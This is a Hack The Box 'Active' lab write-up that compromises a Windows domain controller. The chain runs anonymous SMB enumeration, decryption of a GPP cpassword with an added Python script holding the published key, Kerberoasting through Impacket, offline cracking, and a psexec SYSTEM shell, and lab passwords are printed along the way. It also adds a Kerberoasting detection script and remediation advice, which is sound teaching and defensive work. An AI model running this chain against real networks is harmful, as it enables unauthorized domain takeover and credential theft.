HTB : Active



Network Enumeration

To begin our exploration of the network, let’s initiate an nmap scan in order to identify all open ports.

┌──(kali㉿kali)-[~/active]
└─$ nmap -p- 10.129.170.93
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-18 11:13 EDT
Nmap scan report for 10.129.170.93
Host is up (0.013s latency).
Not shown: 65512 closed tcp ports (conn-refused)
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5722/tcp open msdfsr
9389/tcp open adws
47001/tcp open winrm
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49157/tcp open unknown
49158/tcp open unknown
49165/tcp open unknown
49170/tcp open unknown
49172/tcp open unknown

To identify the services behind those ports, run a version and default-script scan (-sV -sC) against the host.

┌──(kali㉿kali)-[~/active]
└─$ nmap -sV -sC  10.129.170.93 
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-18 11:07 EDT
Nmap scan report for 10.129.170.93
Host is up (0.0055s latency).
Not shown: 982 closed tcp ports (conn-refused)
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2023-03-18 15:10:41Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
49152/tcp open  msrpc         Microsoft Windows RPC
49153/tcp open  msrpc         Microsoft Windows RPC
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         Microsoft Windows RPC
49165/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 2m48s
| smb2-time: 
|   date: 2023-03-18T15:11:36
|_  start_date: 2023-03-18T15:07:00
| smb2-security-mode: 
|   210: 
|_    Message signing enabled and required

Add the domain name found in the nmap LDAP output (active.htb) to /etc/hosts:

10.129.205.178 active.htb 

SMB Enumeration

An SMB null session is an unauthenticated connection (empty username and empty password) to a Windows host. Where it is still allowed, it exposes share listings and sometimes user and group information without any credentials, which is why it should be disabled; checking for it costs nothing.

Use smbmap to check for null sessions.

┌──(kali㉿kali)-[~/active]
└─$ smbmap -u "" -p "" -P 445 -H 10.129.205.178                                                    
[+] IP: 10.129.205.178:445      Name: active.htb                                        
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        IPC$                                                    NO ACCESS       Remote IPC
        NETLOGON                                                NO ACCESS       Logon server share 
        Replication                                             READ ONLY
        SYSVOL                                                  NO ACCESS       Logon server share 
        Users                                                   NO ACCESS

Use the recurse option in smbclient to list every file in the Replication share (the only one readable anonymously).

smbclient -U '%' --no-pass -c 'recurse;ls' //10.129.205.178/Replication

One file stands out: a Groups.xml under the Group Policy Preferences directory of the Default Domain Policy.

\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups
  .                                   D        0  Sat Jul 21 06:37:44 2018
  ..                                  D        0  Sat Jul 21 06:37:44 2018
  Groups.xml                          A      533  Wed Jul 18 16:46:06 2018

Download Groups.xml and view the file.

<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>

We found a username and a cpassword attribute. Group Policy Preferences (GPP) let administrators set account passwords through Group Policy, and the value is stored in SYSVOL as AES-256 ciphertext under a fixed key that Microsoft itself documented. Anyone who can read the policy files (every domain user, and here even an anonymous session on the Replication share) can therefore decrypt it. Microsoft stopped creating new cpassword entries in 2014, but existing ones stay in SYSVOL until someone removes them. Kali ships the gpp-decrypt tool for exactly this.

┌──(kali㉿kali)-[~/active]
└─$ gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
GPPstillStandingStrong2k18
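The following Python script is an added example for this write-up, not the gpp-decrypt tool or any code from the original post. It audits a local copy of a GPP XML file for cpassword attributes and decrypts them the way gpp-decrypt does: AES-256-CBC under the key Microsoft published, zero IV, PKCS#7 padding, UTF-16-LE plaintext. The embedded XML is the Groups.xml recovered on this page; the function names are this example's own. It uses the cryptography package if installed and falls back to pycryptodome.

```python
"""Audit a Group Policy Preferences XML file for cpassword values.

Added example for this write-up, not the gpp-decrypt tool itself. It
does what gpp-decrypt does: the cpassword attribute is AES-256-CBC
ciphertext under a fixed key that Microsoft published in its own
documentation, with a zero IV, PKCS#7 padding and UTF-16-LE plaintext.
The sample XML is the Groups.xml recovered from the Replication share.
"""
import base64
import xml.etree.ElementTree as ET

# The AES-256 key Microsoft documented for GPP cpassword values (32 bytes).
GPP_AES_KEY = bytes.fromhex(
    "4e9906e8fcb66cc9faf49310620ffee8"
    "f496e806cc057990209b09a433b66c1b"
)
GPP_IV = bytes(16)  # all-zero IV, also fixed


def _aes_cbc_decrypt(key: bytes, iv: bytes, data: bytes) -> bytes:
    """Raw AES-CBC decrypt with whichever common library is installed."""
    try:
        from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
        dec = Cipher(algorithms.AES(key), modes.CBC(iv)).decryptor()
        return dec.update(data) + dec.finalize()
    except ImportError:
        from Crypto.Cipher import AES  # pycryptodome fallback
        return AES.new(key, AES.MODE_CBC, iv).decrypt(data)


def decrypt_cpassword(cpassword: str) -> str:
    """Turn a cpassword attribute back into the cleartext password."""
    # Groups.xml stores the Base64 without '=' padding; restore it first.
    cpassword += "=" * (-len(cpassword) % 4)
    ciphertext = base64.b64decode(cpassword)
    if len(ciphertext) % 16:
        raise ValueError("ciphertext is not a whole number of AES blocks")
    plain = _aes_cbc_decrypt(GPP_AES_KEY, GPP_IV, ciphertext)
    # Strip PKCS#7 padding, refusing anything malformed.
    pad = plain[-1]
    if not 1 <= pad <= 16 or plain[-pad:] != bytes([pad]) * pad:
        raise ValueError("bad padding: not a GPP cpassword or wrong key")
    return plain[:-pad].decode("utf-16-le")


def find_cpasswords(xml_text: str):
    """Return (tag, userName, cleartext) for every cpassword in the XML."""
    findings = []
    root = ET.fromstring(xml_text.encode("utf-8"))
    for el in root.iter():
        cp = el.get("cpassword")
        if cp:  # cpassword="" means no password is stored
            findings.append((el.tag, el.get("userName", ""), decrypt_cpassword(cp)))
    return findings


# Sample input: the Groups.xml found on the page, embedded verbatim.
GROUPS_XML = """<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\\SVC_TGS"/></User>
</Groups>"""

if __name__ == "__main__":
    for tag, user, pwd in find_cpasswords(GROUPS_XML):
        print(f"{tag}: {user} -> {pwd}")
```

Point find_cpasswords at any Groups.xml, Services.xml, ScheduledTasks.xml or similar Preferences file copied from SYSVOL; every non-empty cpassword it reports is a credential that should be rotated and the entry removed from the policy.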

Let’s use the newly found creds to check what shares we can see now.

┌──(kali㉿kali)-[~/active]
└─$ smbmap -H 10.129.91.65 -d active.htb -u SVC_TGS -p GPPstillStandingStrong2k18
[+] IP: 10.129.91.65:445        Name: 10.129.91.65
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        IPC$                                                    NO ACCESS       Remote IPC
        NETLOGON                                                READ ONLY       Logon server share
        Replication                                             READ ONLY
        SYSVOL                                                  READ ONLY       Logon server share
        Users                                                   READ ONLY

The Users share is readable now. Let’s connect to it with smbclient.

┌──(kali㉿kali)-[~/active]
└─$ smbclient //10.129.91.65/Users --user=active.htb\\SVC_TGS%GPPstillStandingStrong2k18                
Try "help" to get a list of possible commands.
smb: \> ls
  .                                  DR        0  Sat Jul 21 10:39:20 2018
  ..                                 DR        0  Sat Jul 21 10:39:20 2018
  Administrator                       D        0  Mon Jul 16 06:14:21 2018
  All Users                       DHSrn        0  Tue Jul 14 01:06:44 2009
  Default                           DHR        0  Tue Jul 14 02:38:21 2009
  Default User                    DHSrn        0  Tue Jul 14 01:06:44 2009
  desktop.ini                       AHS      174  Tue Jul 14 00:57:55 2009
  Public                             DR        0  Tue Jul 14 00:57:55 2009
  SVC_TGS                             D        0  Sat Jul 21 11:16:32 2018

                10459647 blocks of size 4096. 5209799 blocks available
smb: \> cd SVC_TGS
smb: \SVC_TGS\> ls
  .                                   D        0  Sat Jul 21 11:16:32 2018
  ..                                  D        0  Sat Jul 21 11:16:32 2018
  Contacts                            D        0  Sat Jul 21 11:14:11 2018
  Desktop                             D        0  Sat Jul 21 11:14:42 2018
  Downloads                           D        0  Sat Jul 21 11:14:23 2018
  Favorites                           D        0  Sat Jul 21 11:14:44 2018
  Links                               D        0  Sat Jul 21 11:14:57 2018
  My Documents                        D        0  Sat Jul 21 11:15:03 2018
  My Music                            D        0  Sat Jul 21 11:15:32 2018
  My Pictures                         D        0  Sat Jul 21 11:15:43 2018
  My Videos                           D        0  Sat Jul 21 11:15:53 2018
  Saved Games                         D        0  Sat Jul 21 11:16:12 2018
  Searches                            D        0  Sat Jul 21 11:16:24 2018

                10459647 blocks of size 4096. 5209799 blocks available
smb: \SVC_TGS\> cd Desktop
smb: \SVC_TGS\Desktop\> ls
  .                                   D        0  Sat Jul 21 11:14:42 2018
  ..                                  D        0  Sat Jul 21 11:14:42 2018
  user.txt                           AR       34  Sun Mar 19 06:54:48 2023

                10459647 blocks of size 4096. 5209799 blocks available
smb: \SVC_TGS\Desktop\> get user.txt
getting file \SVC_TGS\Desktop\user.txt of size 34 as user.txt (1.4 KiloBytes/sec) (average 1.4 KiloBytes/sec)

We found the first flag.


Kerberoasting

The user name SVC_TGS (TGS = Ticket Granting Service) is a hint that Kerberos is the next step: any domain account with a Service Principal Name (SPN) can be Kerberoasted by any authenticated domain user.

We can use the GetUserSPNs script from Impacket. It queries LDAP for user accounts that have an SPN set and, with -request, asks the KDC for a TGS ticket for each of them. Part of that ticket is encrypted with the service account’s password hash (RC4-HMAC, etype 23, when the account still allows it), so the ticket can be taken offline and cracked without ever touching the account again. Administrators use the same SPN listing to check service configuration; for an attacker it lists which accounts are exposed to offline password guessing. On the domain controller every such request is logged as event 4769, and an RC4 (0x17) ticket request for a user account rather than a machine account is the classic indicator.

┌──(kali㉿kali)-[~/active]
└─$ impacket-GetUserSPNs active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.129.229.44         
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                   Delegation 
--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------  ----------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 15:06:40.351723  2023-03-19 04:35:39.483704             

Let’s add the -request flag to actually request the ticket.

┌──(kali㉿kali)-[~/active]
└─$ impacket-GetUserSPNs active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.129.229.44 -request
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                   Delegation 
--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------  ----------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 15:06:40.351723  2023-03-19 04:35:39.483704             



[-] CCache file is not found. Skipping...
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$8b9545e6af4755ed25585780e8f681fd$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

Now that we have the TGS hash for the Administrator account, let’s crack it offline with hashcat (mode 13100 handles the $krb5tgs$23$ format). It recovers the password Ticketmaster1968, used below.
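The following detection logic is an added example for this write-up, not part of the original post or of Impacket. It runs the two rules a defender would write for the request shown above over constructed event 4769 records: an RC4 (0x17, the etype 23 in the $krb5tgs$23$ hash) service ticket issued for a user account, and a burst of such tickets for several SPNs from one requester, which is what a GetUserSPNs -request run looks like from the domain controller. The records are reduced to the 4769 fields the rules need, and the second one mirrors the SVC_TGS request on this page; the other accounts and the function names are this example’s own.

```python
"""Spot Kerberoasting in Windows Security event 4769 records.

Added detection example for this write-up, not part of the original post
or of Impacket. Every GetUserSPNs -request produces event 4769 ("A
Kerberos service ticket was requested") on the DC. The tell-tale is the
ticket encryption type: etype 23 = 0x17 = RC4-HMAC, requested for a user
account instead of a machine account. The records below are constructed.
"""
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = "0x17"  # TicketEncryptionType for etype 23

# Constructed 4769 records; the second mirrors the request on the page.
SAMPLE_4769 = [
    {"time": "2023-03-19T04:34:10", "requester": "SVC_TGS@ACTIVE.HTB",
     "service": "DC$", "etype": "0x12", "status": "0x0"},            # AES, machine account: normal
    {"time": "2023-03-19T04:35:39", "requester": "SVC_TGS@ACTIVE.HTB",
     "service": "Administrator", "etype": RC4_HMAC, "status": "0x0"},  # RC4 ticket for a user SPN
    {"time": "2023-03-19T09:00:00", "requester": "alice@ACTIVE.HTB",
     "service": "sqlsvc", "etype": RC4_HMAC, "status": "0x0"},
    {"time": "2023-03-19T09:00:01", "requester": "alice@ACTIVE.HTB",
     "service": "websvc", "etype": RC4_HMAC, "status": "0x0"},
    {"time": "2023-03-19T09:00:02", "requester": "alice@ACTIVE.HTB",
     "service": "backupsvc", "etype": RC4_HMAC, "status": "0x0"},
    {"time": "2023-03-19T09:30:00", "requester": "bob@ACTIVE.HTB",
     "service": "sqlsvc", "etype": RC4_HMAC, "status": "0x12"},      # non-zero failure code: no ticket
]


def is_user_service_account(service_name: str) -> bool:
    """Machine accounts end in '$' and krbtgt is the KDC itself; the rest are user SPNs."""
    return not service_name.endswith("$") and service_name.lower() != "krbtgt"


def detect_kerberoast(events, window=timedelta(minutes=10), burst=3):
    """Return findings as (rule, requester, detail) tuples.

    "rc4_ticket_for_user_spn": one RC4 ticket issued for a user account.
    "rc4_spn_burst": the same requester got RC4 tickets for at least
    `burst` distinct user SPNs inside `window` (GetUserSPNs asks for all).
    """
    findings = []
    rc4_requests = defaultdict(list)
    for ev in events:
        if ev["status"] != "0x0":
            continue  # failed request: no ticket material left the KDC
        if ev["etype"] == RC4_HMAC and is_user_service_account(ev["service"]):
            findings.append(("rc4_ticket_for_user_spn", ev["requester"], ev["service"]))
            rc4_requests[ev["requester"]].append(
                (datetime.fromisoformat(ev["time"]), ev["service"]))
    for requester, reqs in rc4_requests.items():
        reqs.sort()
        for start, _ in reqs:
            services = {s for t, s in reqs if start <= t <= start + window}
            if len(services) >= burst:
                findings.append(("rc4_spn_burst", requester, sorted(services)))
                break  # one burst finding per requester is enough
    return findings


if __name__ == "__main__":
    for rule, who, detail in detect_kerberoast(SAMPLE_4769):
        print(f"{rule:24} {who:22} {detail}")
```

The single-ticket rule is what catches the request on this page: one RC4 ticket for Administrator is enough, since an account that allows RC4 and carries an SPN on a privileged user is the exposure itself. Configuring service accounts for AES only and using group managed service accounts removes the crackable material rather than just alerting on it.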


With the Administrator password, smbmap now shows read and write access on the administrative shares, including C$.

┌──(kali㉿kali)-[~/active]
└─$ smbmap -H 10.129.91.91 -d active.htb -u Administrator -p Ticketmaster1968
[+] IP: 10.129.91.91:445        Name: 10.129.91.91                                      
[|] Work[!] Unable to remove test directory at \\10.129.91.91\SYSVOL\NBDXACOVFJ, please remove manually
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  READ, WRITE     Remote Admin
        C$                                                      READ, WRITE     Default share
        IPC$                                                    NO ACCESS       Remote IPC
        NETLOGON                                                READ, WRITE     Logon server share 
        Replication                                             READ ONLY
        SYSVOL                                                  READ, WRITE     Logon server share 
        Users                                                   READ ONLY

Let’s use smbclient to browse the Users share as Administrator (the session below is shown from the point where we are inside the Administrator profile).

                10459647 blocks of size 4096. 5186566 blocks available
smb: \Users\Administrator\> cd Desktop
smb: \Users\Administrator\Desktop\> ls
  .                                  DR        0  Thu Jan 21 11:49:47 2021
  ..                                 DR        0  Thu Jan 21 11:49:47 2021
  desktop.ini                       AHS      282  Mon Jul 30 09:50:10 2018
  root.txt                           AR       34  Mon Mar 20 05:40:15 2023

                10459647 blocks of size 4096. 5186566 blocks available
smb: \Users\Administrator\Desktop\> get root.txt

root.txt on the Administrator’s desktop is the final flag.


We can also use impacket-psexec to get a shell: it uploads a service binary to ADMIN$ and starts it through the Service Control Manager, which gives us SYSTEM on the domain controller and also explains why it is noisy (a new service is installed on the DC, which defenders can alert on).

┌──(kali㉿kali)-[~/active]
└─$ impacket-psexec active.htb/administrator@10.129.91.91                                          
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

Password:
[*] Requesting shares on 10.129.91.91.....
[*] Found writable share ADMIN$
[*] Uploading file JFJOcVHr.exe
[*] Opening SVCManager on 10.129.91.91.....
[*] Creating service EIwN on 10.129.91.91.....
[*] Starting service EIwN.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32> whoami
nt authority\system
